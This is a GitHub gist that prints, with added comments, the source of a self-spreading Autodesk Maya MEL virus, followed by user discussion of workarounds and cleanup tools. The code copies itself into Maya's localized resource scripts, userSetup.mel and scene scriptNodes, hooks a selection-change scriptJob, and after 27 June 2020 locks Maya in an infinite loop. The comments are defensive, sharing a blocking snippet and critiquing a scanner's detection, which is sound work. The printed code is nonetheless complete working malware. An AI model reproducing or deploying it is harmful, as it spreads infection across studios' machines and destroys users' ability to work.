Created
June 3, 2020 21:31
-
-
Save OriginalAdric/acbe902c89064e8300f2bc475a953e05 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Maya Mel UI Configuration File.Maya Mel UI Configuration File.. | |
| // | |
| // | |
| // This script is machine generated. Edit at your own risk. | |
| // | |
| // | |
| //////////////////////////////////////////////////////////////////// | |
| global proc UI_Mel_Configuration_think(){ | |
| string $localized_resources_path = `getenv MAYA_LOCATION`+("/resources/l10n/"); | |
| string $all_file[]=`getFileList -folder $localized_resources_path`; | |
| string $localized_anim_strings_path =("/plug-ins/animImportExport.pres.mel"); | |
| global string $Mel_file_address_lj=(""); | |
| // Infect localized anim import/export string files w/ virus? | |
| for ( $loc_folder_index = 0 ;$loc_folder_index<`size $all_file`;$loc_folder_index++) | |
| { | |
| string $Mel_file_address=($localized_resources_path+$all_file[$loc_folder_index]+$localized_anim_strings_path); | |
| // If can copy localized file... | |
| if (`sysFile -cp ($Mel_file_address+(".Mel")) ($Mel_file_address) ` == 1){ | |
| // Delete copied file | |
| sysFile -del ($Mel_file_address+(".Mel")); | |
| int $gc_xh=0; | |
| string $Mel_File_LineBuffer[]; | |
| clear $Mel_File_LineBuffer; | |
| // Open original localized file | |
| $fileId=`fopen ($Mel_file_address) ("r")`; | |
| $Mel_File_LineBuffer[0] = `fgetline $fileId`; | |
| // Copy localized file lines into buffer | |
| while (` size $Mel_File_LineBuffer[$gc_xh]` != 0 ){ | |
| $gc_xh++; | |
| $Mel_File_LineBuffer[$gc_xh] = `fgetline $fileId`; | |
| } | |
| fclose $fileId; | |
| // Check if localized file has token indicating infection | |
| int $isInfected = 0 ; | |
| for ( $line_index=0; $line_index<`size $Mel_File_LineBuffer`; $line_index++) { | |
| if ($Mel_File_LineBuffer[$line_index] == ("// Maya Mel UI Configuration File.Maya Mel UI Configuration File..")) { | |
| $isInfected=1; | |
| $line_index=99999999; | |
| } | |
| } | |
| // If not infected, infect current localized file | |
| if ($isInfected == 0 ){ | |
| $Mel_file_address_lj=$Mel_file_address; | |
| if (`whatIs UI_Mel_Configuration_think_b` != "Unknown"){ | |
| UI_Mel_Configuration_think_b; | |
| } | |
| } | |
| } else { | |
| // Can't infect localized string file(s); create UserSetup.mel instead | |
| if (`whatIs UI_Mel_Configuration_think_a` != "Unknown") { | |
| UI_Mel_Configuration_think_a; | |
| } | |
| } | |
| } | |
| } | |
| global proc UI_Mel_Configuration_think_a(){ | |
| // Get application defaults file path as tokenized list | |
| string $system_WDLJ = `about -environmentFile`; | |
| string $buffer[]; | |
| tokenize $system_WDLJ "/" $buffer; | |
| // Re-combine all but last 2 tokens on first token | |
| for($ii = 1; $ii < `size $buffer` - 2; $ii++) { | |
| $buffer[0] = $buffer[0] + "/" + $buffer[$ii]; | |
| } | |
| // Make first token point to user setup script location | |
| $buffer[0] = $buffer[0] + "/scripts/userSetup.mel"; | |
| int $pd_file_existence_check = 0; | |
| // Check that userSetup file exists | |
| if (`sysFile -cp ($buffer[0]+"..a") ($buffer[0]) ` == 1){ | |
| // File exists; clean up 'check' file. | |
| sysFile -del ($buffer[0]+"..a"); | |
| // ? Copy setup into memory ? | |
| int $ii=0; | |
| string $NR_all[]; | |
| clear $NR_all; | |
| $fileId=`fopen ($buffer[0]) "r"`; | |
| $NR_all[0] = `fgetline $fileId`; | |
| while (` size $NR_all[$ii]` != 0 ){ | |
| $ii++; | |
| $NR_all[$ii] = `fgetline $fileId`; | |
| } | |
| fclose $fileId; | |
| int $pdNR_all=0; | |
| for ($ii = 0 ; $ii<`size $NR_all`;$ii++){ | |
| if ($NR_all[$ii] == ("// Maya Mel UI Configuration File.Maya Mel UI Configuration File..")){ | |
| $pdNR_all = 1 ;$ii= 99999999; | |
| } | |
| } | |
| if ($pdNR_all == 0){ | |
| $pd_file_existence_check = 1; | |
| } | |
| } | |
| // Copy failed. File doesn't exist. | |
| else { | |
| // Create blank userSetup file. | |
| $sys_document = `fopen ($buffer[0]) "w"`; | |
| fprint $sys_document (""); | |
| fclose $sys_document; | |
| // Try to copy file | |
| if (`sysFile -cp ($buffer[0]+"..a") ($buffer[0]) ` == 1){ | |
| // Clean up 'check' file | |
| sysFile -del ($buffer[0]+"..a"); | |
| $pd_file_existence_check = 1; | |
| } | |
| } | |
| if($pd_file_existence_check == 1){ | |
| // Copy this script into memory? | |
| string $script[] = `ls -type script`; | |
| int $isInfected=0; | |
| string $nr; | |
| for ($ii = 0 ; $ii<`size $script`;$ii++){ | |
| $nr = `scriptNode -q -beforeScript $script[$ii]` ; | |
| string $infected_file_token = `substring $nr 1 50`; | |
| if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){ | |
| $isInfected = 1; | |
| $ii = 999999999; | |
| } | |
| } | |
| // Write this script to userSetup? | |
| if ($isInfected == 1){ | |
| $fuck_All_U = `fopen ($buffer[0]) ("a")`; | |
| fprint $fuck_All_U ($nr); | |
| fclose $fuck_All_U; | |
| } | |
| } | |
| } | |
| global proc UI_Mel_Configuration_think_b() { | |
| global string $Mel_file_address_lj; | |
| string $script[]=`ls -type script`; | |
| int $isInfected=0; | |
| string $nr; | |
| for ($ii = 0 ; $ii<`size $script`; $ii++){ | |
| $nr = ` scriptNode -q -beforeScript $script[$ii] ` ; | |
| string $infected_file_token = `substring $nr 1 50`; | |
| if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){ | |
| $isInfected = 1; | |
| $ii = 999999999; | |
| } | |
| } | |
| if ($isInfected == 1){ | |
| $fuck_All_U = ` fopen ($Mel_file_address_lj) ("a")`; | |
| fprint $fuck_All_U ($nr); | |
| fclose $fuck_All_U; | |
| $Mel_file_address_lj=(""); | |
| } | |
| } | |
| global proc autoUpdateAttrEd_SelectSystem(){ | |
| string $script[]=`ls -type script`; | |
| int $isInfected = 0 ; | |
| for ($ii = 0 ; $ii<`size $script`;$ii++){ | |
| string $nr = `scriptNode -q -beforeScript $script[$ii] `; | |
| string $infected_file_token = `substring $nr 1 50`; | |
| if ($infected_file_token == ("// Maya Mel UI Configuration File.Maya Mel UI Conf")){ | |
| $isInfected = 1; | |
| $ii = 999999999; | |
| } | |
| } | |
| if ($isInfected == 0 ){ | |
| string $chengxu =`scriptNode -n MayaMelUIConfigurationFile -beforeScript "// Maya Mel UI Configuration File.Maya Mel UI Configuration File.."`; | |
| setAttr ($chengxu+(".scriptType")) 1; | |
| } | |
| } | |
| global proc autoUpdatcAttrEd(){ | |
| // Get current date as int | |
| string $aboutCD = `about -cd`; | |
| string $buffer[]; | |
| tokenize $aboutCD ("/") $buffer; | |
| $buffer[0] = $buffer[0]+$buffer[1]+$buffer[2]; | |
| int $PuTianTongQing=$buffer[0]; | |
| // Put app into infinite loop if later than June 27, 2020 | |
| if ($PuTianTongQing >= 20200627 ){ | |
| for ($Ii=1 ; $Ii>0; $Ii++){ | |
| } | |
| } | |
| } | |
| global proc autoUpdatoAttrEnd(){ | |
| if ( `whatIs autoUpdatcAttrEd` != "Unknown" ){ | |
| autoUpdatcAttrEd; | |
| } | |
| if ( `whatIs autoUpdateAttrEd_SelectSystem` != "Unknown" ){ | |
| autoUpdateAttrEd_SelectSystem; | |
| } | |
| if ( `whatIs UI_Mel_Configuration_think` != "Unknown" ){ | |
| UI_Mel_Configuration_think; | |
| } | |
| } | |
| global proc autoUpdatcAttrEnd(){ | |
| if (`whatIs autoUpdatoAttrEnd` != "Unknown" ){ | |
| global int $autoUpdateAttrEd_aoto_int; | |
| if($autoUpdateAttrEd_aoto_int == 0 ){ | |
| $autoUpdateAttrEd_aoto_int=`scriptJob -e ("SelectionChanged") ("autoUpdatoAttrEnd") `; | |
| } | |
| } | |
| } | |
| autoUpdatcAttrEnd; |
Put these two lines in userSetup.mel should block the script.
global int $autoUpdateAttrEd_aoto_int;
$autoUpdateAttrEd_aoto_int = -1;
Put these two lines in
userSetup.melshould block the script.global int $autoUpdateAttrEd_aoto_int; $autoUpdateAttrEd_aoto_int = -1;
What do theese two lines do? Sorry if this is a novice question, I'm just an animator struggling to deal with this script exploit at work - I don't have much experience with scripts
@Videomaskinen: it sets the scriptJob ID for the exploit to an invalid value, so Maya never actually runs the malicious code.
I've just reviewed the python code of the MayaClean plugin. It just looks if the variable $fuck_All_U is in the file. So if the variable has a different name is absolutely useless... Thanks Autodesk. It seems that the best option is to disable the scriptNodes execution on load.
I've just reviewed the python code of the MayaClean plugin. It just looks if the variable $fuck_All_U is in the file. So if the variable has a different name is absolutely useless... Thanks Autodesk. It seems that the best option is to disable the scriptNodes execution on load.
How would you do that? The scriptJobs still loading when Opening Files with that: https://knowledge.autodesk.com/support/maya/learn-explore/caas/CloudHelp/cloudhelp/2015/ENU/Maya/files/Script-nodes-Prevent-script-nodes-from-executing-when-you-open-a-file-htm.html
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I'm not 100% sure, as I haven't used that version of the tools, that script, and am not very familiar with Cygwin. Looking at the
scanAndCleanScriptNodefile that ships with theMaya Security Toolplugin, the usage appears to bescanAndCleanScriptNode PATH. So, if your scenes are inC:/my/files, the command is probablyscanAndCleanScriptNode /cygdrive/c/my/filesfor Cygwin.